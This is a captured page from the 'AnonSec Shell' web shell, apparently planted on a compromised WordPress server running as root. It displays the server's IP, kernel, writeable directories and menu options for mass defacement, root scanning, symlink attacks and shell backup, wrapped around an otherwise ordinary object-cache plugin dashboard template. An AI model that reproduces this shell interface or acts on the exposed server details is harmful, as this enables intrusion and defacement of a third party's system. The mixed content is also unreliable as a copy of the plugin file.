AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.145.7.194   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/mu-plugins/object-cache-pro/src/Plugin/templates/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/mu-plugins/object-cache-pro/src/Plugin/templates/pages/dashboard.phtml
<?php

$screen = get_current_screen();

?>

<div class="wrap">

    <h1>Dashboard</h1>

    <div id="dashboard-widgets-wrap">

        <div id="dashboard-widgets" class="metabox-holder">
            <div id="postbox-container-1" class="postbox-container">
                <?php do_meta_boxes($screen->id, 'normal', ''); ?>
            </div>
            <div id="postbox-container-2" class="postbox-container">
                <?php do_meta_boxes($screen->id, 'side', ''); ?>
            </div>
            <div id="postbox-container-3" class="postbox-container">
                <?php do_meta_boxes($screen->id, 'column3', ''); ?>
            </div>
            <div id="postbox-container-4" class="postbox-container">
                <?php do_meta_boxes($screen->id, 'column4', ''); ?>
            </div>
        </div>

        <?php wp_nonce_field('closedpostboxes', 'closedpostboxesnonce', false); ?>
        <?php wp_nonce_field('meta-box-order', 'meta-box-order-nonce', false); ?>

    </div>

</div>

<script>
    jQuery(document).ready(function ($) {
        $('.if-js-closed').removeClass('if-js-closed').addClass('closed');

        if (typeof postboxes !== 'undefined') {
            postboxes.add_postbox_toggles('<?php echo $screen->id; ?>');
        }
    });
</script>

Anon7 - 2022
AnonSec Team